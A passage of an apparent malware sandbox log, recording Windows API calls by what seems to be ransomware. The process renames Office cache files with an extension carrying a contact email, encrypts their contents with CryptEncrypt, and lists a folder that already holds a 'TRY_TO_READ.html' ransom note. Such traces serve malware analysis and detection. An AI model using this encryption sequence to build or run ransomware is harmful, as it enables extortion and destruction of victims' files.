	[0067.199] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR"
	[0067.199] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0067.202] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460
	[0067.202] GetProcessHeap () returned 0x540000
	[0067.202] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db238 | out: hHeap=0x540000) returned 1
	[0067.202] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=1450) returned 1
	[0067.202] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x5aa
	[0067.202] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0067.203] GetProcessHeap () returned 0x540000
	[0067.203] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0067.203] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0067.203] WriteFile (in: hFile=0x460, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0067.220] WriteFile (in: hFile=0x460, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0067.220] WriteFile (in: hFile=0x460, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0067.220] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x5aa) returned 0x5db238
	[0067.220] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x5aa) returned 0x5db7f0
	[0067.220] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0067.221] ReadFile (in: hFile=0x460, lpBuffer=0x5db238, nNumberOfBytesToRead=0x5aa, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5db238*, lpNumberOfBytesRead=0x3a1f778*=0x5aa, lpOverlapped=0x0) returned 1
	[0067.221] SetFilePointer (in: hFile=0x460, lDistanceToMove=-1450, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0067.221] WriteFile (in: hFile=0x460, lpBuffer=0x5db7f0*, nNumberOfBytesToWrite=0x5aa, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5db7f0*, lpNumberOfBytesWritten=0x3a1f778*=0x5aa, lpOverlapped=0x0) returned 1
	[0067.221] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db238 | out: hHeap=0x540000) returned 1
	[0067.221] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db7f0 | out: hHeap=0x540000) returned 1
	[0067.221] CloseHandle (hObject=0x460) returned 1
	[0067.222] GetProcessHeap () returned 0x540000
	[0067.222] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0067.222] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0067.222] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0067.222] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598df8 | out: hHeap=0x540000) returned 1
	[0067.222] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598d40 | out: hHeap=0x540000) returned 1
	[0067.222] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xb0) returned 0x598d40
	[0067.222] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0067.222] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0067.222] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0067.222] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0067.222] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi", dwFileAttributes=0x80) returned 1
	[0067.222] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 81
	[0067.222] GetProcessHeap () returned 0x540000
	[0067.222] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x108) returned 0x5db238
	[0067.222] lstrcpyW (in: lpString1=0x5db238, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi"
	[0067.222] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR"
	[0067.222] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0067.224] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460
	[0067.224] GetProcessHeap () returned 0x540000
	[0067.224] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db238 | out: hHeap=0x540000) returned 1
	[0067.224] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=2503680) returned 1
	[0067.224] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x263400
	[0067.224] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0067.224] GetProcessHeap () returned 0x540000
	[0067.225] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0067.225] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0067.225] WriteFile (in: hFile=0x460, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0067.241] WriteFile (in: hFile=0x460, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0067.241] WriteFile (in: hFile=0x460, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0067.241] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x263400) returned 0x3a20020
	[0067.242] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x263400) returned 0x3c90020
	[0067.242] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0067.242] ReadFile (in: hFile=0x460, lpBuffer=0x3a20020, nNumberOfBytesToRead=0x263400, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20020*, lpNumberOfBytesRead=0x3a1f778*=0x263400, lpOverlapped=0x0) returned 1
	[0067.352] SetFilePointer (in: hFile=0x460, lDistanceToMove=-2503680, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0067.352] WriteFile (in: hFile=0x460, lpBuffer=0x3c90020*, nNumberOfBytesToWrite=0x263400, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c90020*, lpNumberOfBytesWritten=0x3a1f778*=0x263400, lpOverlapped=0x0) returned 1
	[0067.378] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x3a20020 | out: hHeap=0x540000) returned 1
	[0067.388] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x3c90020 | out: hHeap=0x540000) returned 1
	[0067.399] CloseHandle (hObject=0x460) returned 1
	[0067.435] GetProcessHeap () returned 0x540000
	[0067.435] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0067.435] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0067.435] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0067.435] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598d40 | out: hHeap=0x540000) returned 1
	[0067.435] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598c88 | out: hHeap=0x540000) returned 1
	[0067.435] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x90) returned 0x56b300
	[0067.435] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db1a0 | out: hHeap=0x540000) returned 1
	[0067.435] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588ef8 | out: hHeap=0x540000) returned 1
	[0067.435] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596dc8 | out: hHeap=0x540000) returned 1
	[0067.435] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc9e79670, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9e79670, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x575960
	[0067.436] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0067.436] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0067.436] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588ef8
	[0067.436] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0067.436] GetLastError () returned 0x0
	[0067.436] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc0) returned 0x5db0d8
	[0067.436] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588ef8 | out: hHeap=0x540000) returned 1
	[0067.436] GetLastError () returned 0x0
	[0067.436] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583950
	[0067.436] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58bc00
	[0067.436] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58bc00 | out: hHeap=0x540000) returned 1
	[0067.436] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5d8d10
	[0067.436] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x5da0f0
	[0067.436] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5da0f0 | out: hHeap=0x540000) returned 1
	[0067.436] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0067.436] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0067.436] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d8d10 | out: hHeap=0x540000) returned 1
	[0067.436] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583950 | out: hHeap=0x540000) returned 1
	[0067.436] FindNextFileW (in: hFindFile=0x575960, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc9e79670, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9e79670, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0067.436] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0067.436] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0067.436] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588ef8
	[0067.436] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0067.436] GetLastError () returned 0x0
	[0067.437] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc0) returned 0x5db0d8
	[0067.437] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588ef8 | out: hHeap=0x540000) returned 1
	[0067.437] GetLastError () returned 0x0
	[0067.437] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583950
	[0067.437] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58bc00
	[0067.437] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58bc00 | out: hHeap=0x540000) returned 1
	[0067.437] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5d8d10
	[0067.437] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x5da0f0
	[0067.437] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5da0f0 | out: hHeap=0x540000) returned 1
	[0067.437] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0067.437] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0067.437] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d8d10 | out: hHeap=0x540000) returned 1
	[0067.437] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583950 | out: hHeap=0x540000) returned 1
	[0067.437] FindNextFileW (in: hFindFile=0x575960, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc40b730, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x265c00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PublisherMUI.msi", cAlternateFileName="PUBLIS~1.MSI")) returned 1
	[0067.437] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0067.437] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0067.437] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588ef8
	[0067.437] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0067.437] GetLastError () returned 0x0
	[0067.437] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc0) returned 0x5db0d8
	[0067.437] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588ef8 | out: hHeap=0x540000) returned 1
	[0067.437] GetLastError () returned 0x0
	[0067.437] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583950
	[0067.437] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583918
	[0067.437] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0067.437] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0067.437] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583918 | out: hHeap=0x540000) returned 1
	[0067.437] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583950 | out: hHeap=0x540000) returned 1
	[0067.437] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xb0) returned 0x598c88
	[0067.437] FindNextFileW (in: hFindFile=0x575960, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc3e4630, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5aa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PublisherMUI.xml", cAlternateFileName="PUBLIS~1.XML")) returned 1
	[0067.437] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0067.437] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0067.437] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588ef8
	[0067.438] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0067.438] GetLastError () returned 0x0
	[0067.438] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc0) returned 0x5db0d8
	[0067.438] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588ef8 | out: hHeap=0x540000) returned 1
	[0067.438] GetLastError () returned 0x0
	[0067.438] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583950
	[0067.438] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583918
	[0067.438] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0067.438] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0067.438] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583918 | out: hHeap=0x540000) returned 1
	[0067.438] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583950 | out: hHeap=0x540000) returned 1
	[0067.438] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xb0) returned 0x598d40
	[0067.438] FindNextFileW (in: hFindFile=0x575960, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3cd17e00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3cd17e00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc47e320, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x97f3f4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PubLR.cab", cAlternateFileName="")) returned 1
	[0067.438] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0067.438] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0067.438] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588ef8
	[0067.438] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0067.438] GetLastError () returned 0x0
	[0067.438] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc0) returned 0x5db0d8
	[0067.438] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588ef8 | out: hHeap=0x540000) returned 1
	[0067.438] GetLastError () returned 0x0
	[0067.438] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5d8d10
	[0067.438] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583950
	[0067.438] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0067.438] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0067.438] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583950 | out: hHeap=0x540000) returned 1
	[0067.438] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d8d10 | out: hHeap=0x540000) returned 1
	[0067.438] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5db1a0
	[0067.438] FindNextFileW (in: hFindFile=0x575960, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x648, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1
	[0067.438] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0067.438] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0067.438] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588ef8
	[0067.438] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0067.438] GetLastError () returned 0x0
	[0067.439] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc0) returned 0x5db0d8
	[0067.439] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588ef8 | out: hHeap=0x540000) returned 1
	[0067.439] GetLastError () returned 0x0
	[0067.439] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5d8d10
	[0067.439] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583950
	[0067.439] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0067.439] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0067.439] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583950 | out: hHeap=0x540000) returned 1
	[0067.439] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d8d10 | out: hHeap=0x540000) returned 1
	[0067.439] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5db248
	[0067.439] FindNextFileW (in: hFindFile=0x575960, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9e79670, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9e79670, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9e79670, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0067.439] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0067.439] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0067.439] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588ef8
